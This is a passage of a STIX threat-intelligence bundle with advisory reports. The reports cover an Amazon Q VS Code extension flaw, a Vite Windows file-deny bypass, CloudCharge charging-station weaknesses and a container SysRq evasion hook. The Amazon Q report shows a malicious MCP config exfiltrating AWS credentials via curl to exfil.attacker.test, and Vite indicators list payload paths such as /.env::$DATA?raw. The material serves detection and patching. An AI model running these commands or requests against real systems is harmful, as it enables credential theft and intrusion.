{
  "type": "bundle",
  "id": "bundle--17b8d4db-a436-54ac-9b30-1ef4771e7dfa",
  "objects": [
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7ad92336-8d78-5649-af2a-420a07274e6d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://exfil.attacker.test/collect",
      "pattern": "[url:value = 'https://exfil.attacker.test/collect']",
      "pattern_type": "stix",
      "valid_from": "2026-06-26T12:13:02Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--130f34d5-556f-57f0-b27f-24e99eccbbec",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--22b1d610-5047-56d6-a0a0-b08940ad3993",
      "target_ref": "indicator--7ad92336-8d78-5649-af2a-420a07274e6d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b6c5305e-efd8-565b-ae27-b8e86056958d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: exfil.attacker.test",
      "pattern": "[domain-name:value = 'exfil.attacker.test']",
      "pattern_type": "stix",
      "valid_from": "2026-06-26T12:13:02Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b1c0e476-55eb-5383-8305-ad8b1a101a50",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--22b1d610-5047-56d6-a0a0-b08940ad3993",
      "target_ref": "indicator--b6c5305e-efd8-565b-ae27-b8e86056958d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--eea27fb3-0fc5-548f-8e5f-b89b0f05aa78",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--22b1d610-5047-56d6-a0a0-b08940ad3993",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--91d91e97-8144-5994-a180-c21fe85a808b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--22b1d610-5047-56d6-a0a0-b08940ad3993",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f2b27898-23bb-55fb-873f-9328ac903f15",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--22b1d610-5047-56d6-a0a0-b08940ad3993",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over Web Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1567",
          "url": "https://attack.mitre.org/techniques/T1567"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ee1421da-b0ae-527c-b8e7-b4c391a3e94b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--22b1d610-5047-56d6-a0a0-b08940ad3993",
      "target_ref": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--22b1d610-5047-56d6-a0a0-b08940ad3993",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-12957: Amazon Q VS Code Extension Arbitrary Code Execution",
      "description": "## Overview\n\nWiz Research discovered a high-severity vulnerability, CVE-2026-12957, in the Amazon Q Developer Extension for Visual Studio Code, impacting language server versions prior to 1.65.0. This flaw allowed for arbitrary code execution and cloud credential theft. When a developer opened a malicious repository containing a specially crafted `.amazonq/mcp.json` file, Amazon Q would automatically load and execute Model Context Protocol (MCP) server configurations defined within this file. Critically, this execution occurred without user consent, workspace trust checks, or any visible indicators, and the spawned processes inherited the developer's full environment, including sensitive AWS credentials, API keys, and SSH agent sockets. This vulnerability, which demonstrates a broader pattern affecting AI coding tools, has since been remediated by Amazon in language server version 1.65.0, which now implements a consent prompt.\n\n## Attack Chain\n\n1.  Attacker crafts a malicious repository containing a `.amazonq/mcp.json` file that defines an MCP server with a malicious command (e.g., `bash -c \"aws sts get-caller-identity | curl...\"`).\n2.  The attacker induces a developer to clone the malicious repository, potentially through social engineering, typosquatting, or malicious pull requests.\n3.  The developer opens the cloned repository in VS Code, with the Amazon Q Developer Extension installed and active.\n4.  Amazon Q automatically loads and executes the malicious MCP server configuration from the `.amazonq/mcp.json` file located in the workspace root without prompting the user for consent.\n5.  The malicious command executes on the developer's machine, inheriting their complete environment, including sensitive AWS credentials (e.g., `AWS_ACCESS_KEY_ID`, `AWS_SECRET_ACCESS_KEY`).\n6.  The output of the command, containing the developer's active AWS session information (e.g., from `aws sts get-caller-identity`), is exfiltrated to the attacker's controlled endpoint (e.g., `exfil.attacker.test`) via `curl`.\n7.  The attacker uses the stolen AWS credentials to gain unauthorized access, establish persistence, or perform lateral movement within the developer's associated cloud environment.\n\n## Impact\n\nThe successful exploitation of CVE-2026-12957 results in immediate arbitrary code execution on the victim's machine with minimal user interaction, often occurring silently without visible indicators. This leads to the theft of cloud credentials (AWS, GCP, Azure), API keys, and other secrets, enabling attackers to establish cloud persistence by backdooring IAM users or infrastructure. The attacker can then perform supply chain attacks targeting maintainers of popular projects or conduct lateral movement into production systems if the developer has sufficient access. This vulnerability facilitates critical compromise of development environments and cloud resources, posing a significant risk to an organization's software supply chain and infrastructure.\n\n## Recommendation\n\n*   Immediately upgrade the Amazon Q Developer Extension for Visual Studio Code to language server version 1.65.0 or later to patch CVE-2026-12957.\n*   Educate developers to be cautious with untrusted repositories and review MCP consent prompts carefully when displayed by Amazon Q.\n*   Deploy the Sigma rule provided in this brief to your SIEM to detect suspicious credential exfiltration attempts.\n*   Monitor for the creation or modification of `.amazonq/mcp.json` files in development repositories, particularly in untrusted contexts.\n*   Block the C2 domain `exfil.attacker.test` listed in the IOC table at the DNS resolver and network perimeter.\n",
      "published": "2026-06-26T12:13:02Z",
      "labels": [
        "vulnerability",
        "code-editor",
        "cloud",
        "rce",
        "vs-code",
        "supply-chain"
      ],
      "object_refs": [
        "indicator--7ad92336-8d78-5649-af2a-420a07274e6d",
        "indicator--b6c5305e-efd8-565b-ae27-b8e86056958d",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.wiz.io/blog/amazon-q-vulnerability"
        },
        {
          "source_name": "reference",
          "url": "https://thehackernews.com/2026/06/amazon-q-developer-flaw-could-let.html"
        },
        {
          "source_name": "reference",
          "url": "https://www.securityweek.com/amazon-q-flaw-enabled-cloud-credential-theft-via-malicious-repositories/"
        },
        {
          "source_name": "reference",
          "url": "https://www.darkreading.com/cloud-security/amazon-q-vs-extension-flaw-leads-cloud-credential-theft"
        },
        {
          "source_name": "reference",
          "url": "https://www.wiz.io/blog/ghostapproval-a-trust-boundary-gap-in-ai-coding-assistants"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ec4d5a8d-2224-5dca-bd9b-11090003e83d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: http://localhost:5173/.env::$DATA?raw",
      "pattern": "[url:value = 'http://localhost:5173/.env::$DATA?raw']",
      "pattern_type": "stix",
      "valid_from": "2026-06-15T17:24:10Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a4501817-e60b-5036-929c-4d422773d5b9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ba556970-ebaf-5f3c-a6fe-390f71c16016",
      "target_ref": "indicator--ec4d5a8d-2224-5dca-bd9b-11090003e83d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--375dfdc8-52b7-5ae9-82c4-ddf632359371",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: http://localhost:5173/tls.pem::$DATA?raw",
      "pattern": "[url:value = 'http://localhost:5173/tls.pem::$DATA?raw']",
      "pattern_type": "stix",
      "valid_from": "2026-06-15T17:24:10Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--172a3a04-28bc-5f6d-9f63-b6369526ad98",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ba556970-ebaf-5f3c-a6fe-390f71c16016",
      "target_ref": "indicator--375dfdc8-52b7-5ae9-82c4-ddf632359371"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ea9ec01b-8127-55b4-a1a7-f33f607714f8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://sploitus.com/exploit?id=5102680F-B61E-58F4-BFE2-6D894F92EE59",
      "pattern": "[url:value = 'https://sploitus.com/exploit?id=5102680F-B61E-58F4-BFE2-6D894F92EE59']",
      "pattern_type": "stix",
      "valid_from": "2026-06-15T17:24:10Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--27c8a4d2-93eb-5fd0-ba4b-3103e0c37d17",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ba556970-ebaf-5f3c-a6fe-390f71c16016",
      "target_ref": "indicator--ea9ec01b-8127-55b4-a1a7-f33f607714f8"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d090beab-354f-5ca5-bff8-4e0de451ed2b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ba556970-ebaf-5f3c-a6fe-390f71c16016",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ba556970-ebaf-5f3c-a6fe-390f71c16016",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Vite Dev Server `server.fs.deny` Bypass on Windows (CVE-2026-53571)",
      "description": "## Overview\n\nA critical information disclosure vulnerability, tracked as CVE-2026-53571, affects the Vite development server running on Windows. This flaw allows an attacker to bypass security restrictions imposed by `server.fs.deny`, which is designed to prevent direct access to sensitive files such as `.env` configurations or TLS certificates (`.crt`, `.pem`). The bypass occurs because Vite's deny logic fails to properly normalize Windows-specific path forms, specifically NTFS Alternate Data Streams (ADS) (e.g., `::$DATA`) and 8.3 short names. When an affected Vite dev server is explicitly exposed to the network (via `--host` or `server.host`), and sensitive files reside within allowed `server.fs.allow` directories on NTFS volumes or volumes with 8.3 short name generation enabled, an attacker can craft specific HTTP requests (e.g., `/.env::$DATA?raw`) to retrieve the contents of these protected files. This vulnerability affects npm/vite versions \u003e= 8.0.0, \u003c= 8.0.15; \u003e= 7.0.0, \u003c= 7.3.4; \u003c= 6.4.2; and npm/vite-plus \u003c= 0.1.23, posing a significant risk of sensitive information exfiltration for development environments.\n\n## Attack Chain\n\n1.  A developer initializes a Vite project and starts the development server on a Windows operating system.\n2.  The Vite dev server is explicitly exposed to the network using the `--host` CLI option or the `server.host` configuration option.\n3.  Sensitive files, such as `.env` or `tls.pem`, exist within directories allowed by `server.fs.allow` and are protected by `server.fs.deny`.\n4.  An attacker, with network access to the exposed Vite dev server, crafts an HTTP GET request containing a Windows-specific alternate path form (e.g., `/.env::$DATA`) and the `?raw` parameter.\n5.  Vite's `server.fs.deny` security check is performed against the unnormalized request path, which the logic incorrectly deems as allowed.\n6.  The Windows operating system then resolves the `::$DATA` alternate data stream to the default data stream of the original sensitive file.\n7.  Vite's dev server retrieves the content of the sensitive file (e.g., `.env`) and serves it in the HTTP response.\n8.  The attacker successfully exfiltrates the contents of the sensitive file, leading to information disclosure (e.g., API keys, database credentials, certificates).\n\n## Impact\n\nSuccessful exploitation of CVE-2026-53571 leads to unauthorized information disclosure, potentially exposing sensitive data such as API keys, database credentials, or cryptographic keys (e.g., TLS certificates) that are stored in files like `.env` or `*.pem`. While directly impacting development environments, such breaches can provide attackers with critical intelligence or credentials to pivot into production systems or sensitive internal resources. The vulnerability primarily affects Vite development environments running on Windows that are inadvertently exposed to untrusted networks. The scope of victims depends on how widely exposed Vite dev servers with sensitive files exist; concrete numbers are not available, but the potential for access to development secrets is high.\n\n## Recommendation\n\n*   **Patch CVE-2026-53571**: Immediately update Vite to a patched version to remediate CVE-2026-53571. Refer to the GHSA advisory linked in the references for specific versions.\n*   **Network Segmentation**: Ensure development servers, especially those running Vite, are not exposed to untrusted networks (e.g., the internet). Restrict access to `localhost` or internal subnets as much as possible.\n*   **Deploy Detection Rules**: Implement the provided Sigma rules into your SIEM to detect exploitation attempts of CVE-2026-53571 based on suspicious `cs-uri-stem` and `cs-uri-query` patterns in webserver logs.\n*   **Enable Webserver Logging**: Ensure detailed webserver access logs are enabled and ingested into your SIEM, specifically capturing `cs-uri-stem` and `cs-uri-query` to facilitate detection of the patterns identified in this brief.\n",
      "published": "2026-06-15T17:24:10Z",
      "labels": [
        "information-disclosure",
        "bypass",
        "web-vulnerability",
        "windows",
        "development-server"
      ],
      "object_refs": [
        "indicator--ec4d5a8d-2224-5dca-bd9b-11090003e83d",
        "indicator--375dfdc8-52b7-5ae9-82c4-ddf632359371",
        "indicator--ea9ec01b-8127-55b4-a1a7-f33f607714f8",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-fx2h-pf6j-xcff"
        },
        {
          "source_name": "reference",
          "url": "https://sploitus.com/exploit?id=5102680F-B61E-58F4-BFE2-6D894F92EE59\u0026utm_source=rss\u0026utm_medium=rss"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--58070ea8-d3e1-55ac-ba4a-774d0fd0250d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: cloudcharge.se",
      "pattern": "[domain-name:value = 'cloudcharge.se']",
      "pattern_type": "stix",
      "valid_from": "2026-06-13T12:00:00Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3b3ccb99-ba8e-5df7-b970-aa710b5af3e0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ab1eb7a2-0ae8-527b-aab5-44cacc0f18bb",
      "target_ref": "indicator--58070ea8-d3e1-55ac-ba4a-774d0fd0250d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--eb91e157-9698-5a4f-b799-dcaea5645c99",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://cloudcharge.tech/support/contact/",
      "pattern": "[url:value = 'https://cloudcharge.tech/support/contact/']",
      "pattern_type": "stix",
      "valid_from": "2026-06-13T12:00:00Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--975bde05-95b8-5615-a6d7-78fd35daf52b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ab1eb7a2-0ae8-527b-aab5-44cacc0f18bb",
      "target_ref": "indicator--eb91e157-9698-5a4f-b799-dcaea5645c99"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--08bd3f2c-50e7-52e7-b574-dc0afa4c75bb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ab1eb7a2-0ae8-527b-aab5-44cacc0f18bb",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Steal Web Session Cookie",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1539",
          "url": "https://attack.mitre.org/techniques/T1539"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1d802b53-280e-5c65-bea6-fd8882d2a2c0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ab1eb7a2-0ae8-527b-aab5-44cacc0f18bb",
      "target_ref": "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--42ba2b46-8f37-54b0-8a0c-819916553442",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ab1eb7a2-0ae8-527b-aab5-44cacc0f18bb",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ab1eb7a2-0ae8-527b-aab5-44cacc0f18bb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CloudCharge Vulnerabilities Allow Charging Station Impersonation and DoS",
      "description": "## Overview\n\nMultiple vulnerabilities have been identified in CloudCharge cloudcharge.se, a charging station management platform. These vulnerabilities, including CVE-2026-20781, CVE-2026-25114, CVE-2026-27652, and CVE-2026-20733, could allow attackers to compromise charging stations and backend systems. Specifically, the lack of proper authentication and session management in the WebSocket API enables unauthorized access and control. Given that the vulnerable software is used within the Energy and Transportation Systems sectors worldwide, successful exploitation could disrupt critical infrastructure. The vendor has not responded to coordination requests.\n\n## Attack Chain\n\n1. An attacker identifies a publicly accessible charging station identifier via web-based mapping platforms (CVE-2026-20733).\n2. The attacker connects to the OCPP WebSocket endpoint of a CloudCharge charging station using the discovered identifier (CVE-2026-20781).\n3. Due to the missing authentication mechanisms, the attacker successfully impersonates a legitimate charger (CVE-2026-20781).\n4. The attacker exploits the lack of rate limiting and floods the authentication endpoint with requests, causing a denial-of-service condition by suppressing legitimate charger telemetry (CVE-2026-25114).\n5. Alternatively, the attacker exploits the predictable session identifiers and attempts to hijack an existing charging session (CVE-2026-27652).\n6. The attacker sends malicious OCPP commands to manipulate charging processes or corrupt charging network data reported to the backend (CVE-2026-20781).\n7. The attacker displaces the legitimate charging station's connection, receiving backend commands intended for the original station (CVE-2026-27652).\n8. The ultimate objective is to disrupt charging services, manipulate billing information, or gain persistent access to the charging infrastructure backend.\n\n## Impact\n\nSuccessful exploitation of these vulnerabilities could have significant consequences, particularly in the Energy and Transportation Systems sectors. Attackers could disrupt electric vehicle charging services, leading to widespread outages and transportation delays. Compromised charging stations could be used to manipulate billing information, causing financial losses for both customers and charging station operators. A large-scale denial-of-service attack could overwhelm the CloudCharge backend, rendering entire charging networks inoperable. Given the worldwide deployment of CloudCharge, the impact could be felt across multiple countries.\n\n## Recommendation\n\n*   Monitor network connections to the CloudCharge infrastructure for suspicious WebSocket traffic originating from unexpected sources, using the `Detect Suspicious CloudCharge WebSocket Connection` Sigma rule.\n*   Implement rate limiting on authentication requests to the CloudCharge WebSocket API to mitigate denial-of-service attempts, referencing the information about CVE-2026-25114.\n*   Monitor logs for multiple connections using the same charging station identifier, indicating potential session hijacking attempts, using the `Detect CloudCharge Session Hijacking` Sigma rule and the context for CVE-2026-27652.\n*   Review and restrict access to web-based mapping platforms that may expose charging station authentication identifiers, mitigating the risk associated with CVE-2026-20733.\n*   Contact CloudCharge directly via their support page (https://cloudcharge.tech/support/contact/) to inquire about available patches or mitigations for CVE-2026-20781, CVE-2026-25114, CVE-2026-27652, and CVE-2026-20733.\n",
      "published": "2026-06-13T12:00:00Z",
      "labels": [
        "cloudcharge",
        "ics",
        "vulnerability",
        "dos"
      ],
      "object_refs": [
        "indicator--58070ea8-d3e1-55ac-ba4a-774d0fd0250d",
        "indicator--eb91e157-9698-5a4f-b799-dcaea5645c99",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-057-03"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20781"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25114"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27652"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20733"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2a55aac5-299d-5a36-918b-9bd3616a383c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bf067bb7-4c90-54a0-8a6f-0cc9543fdd90",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--bf067bb7-4c90-54a0-8a6f-0cc9543fdd90",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Singularity SysRq Hook for Defense Evasion",
      "description": "## Overview\n\nThis brief addresses a technique where attackers abuse the Singularity container platform to intercept and manipulate SysRq (System Request) commands. The SysRq mechanism is often used by incident responders as a \"panic button\" to trigger actions like system reboots or kernel dumps during security incidents. By hooking into SysRq within a Singularity container, an attacker could potentially disable or modify these critical functions, hindering incident response efforts and prolonging their access to a compromised system. The specific version of Singularity and the exact method of hooking SysRq are not detailed in the initial report, but the overall concept presents a significant defense evasion tactic. This technique is relevant to organizations using Singularity containers in their infrastructure.\n\n## Attack Chain\n\n1.  **Initial Access:** The attacker gains initial access to a host system, potentially through vulnerabilities in applications or services running on the host.\n2.  **Privilege Escalation:** The attacker escalates privileges on the host system to a level where they can interact with the Singularity container platform.\n3.  **Container Deployment/Modification:** The attacker deploys a malicious Singularity container or modifies an existing container to include a SysRq hook.\n4.  **SysRq Hook Installation:** The attacker implements code within the container that intercepts SysRq commands before they reach the host kernel. This could involve modifying `/proc/sysrq-trigger` or using `ptrace` to intercept kernel calls.\n5.  **Command Interception:** When an administrator attempts to use SysRq (e.g., triggering a kernel panic or reboot), the malicious hook intercepts the command.\n6.  **Action Modification/Suppression:** Instead of allowing the SysRq command to execute, the hook either modifies the command (e.g., prevents a reboot) or suppresses it entirely.\n7.  **Continued Malicious Activity:** With the SysRq mechanism disabled or modified, the attacker can continue their malicious activities (e.g., data exfiltration, lateral movement) without immediate interruption.\n\n## Impact\n\nThe successful exploitation of a SysRq hook within a Singularity container can severely impede incident response efforts. By preventing administrators from using SysRq to quickly contain or analyze a compromised system, attackers gain a significant advantage. This can lead to prolonged data breaches, increased damage to systems, and a greater financial impact on the organization. The impact is particularly high in environments where rapid response and system recovery are critical.\n",
      "published": "2026-06-24T12:00:00Z",
      "labels": [
        "container-security",
        "defense-evasion",
        "sysrq",
        "incident-response"
      ],
      "object_refs": [
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.reddit.com/r/blueteamsec/comments/1raoqkc/hiding_from_the_panic_button_singularity_sysrq/"
        },
        {
          "source_name": "reference",
          "url": "https://blog.kyntra.io/Hiding-from-the-Panic-Button-Singularity-SysRq-Hook"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7f022efc-fbb8-52f9-a703-6ffd5a222cd1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--60782a29-08af-5193-8c30-324b6dbc3338",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4c3e7380-a536-599a-8a1e-e402b95df8d6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Encrypted for Impact",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1486",
          "url": "https://attack.mitre.org/techniques/T1486"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5e5c67a3-3d1f-50c5-8719-0b3318b9f67a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--60782a29-08af-5193-8c30-324b6dbc3338",
      "target_ref": "attack-pattern--4c3e7380-a536-599a-8a1e-e402b95df8d6"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--60782a29-08af-5193-8c30-324b6dbc3338",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Critical Oracle PeopleSoft Enterprise PeopleTools Vulnerability (CVE-2026-35273) Exploited in Ransomware Campaigns",
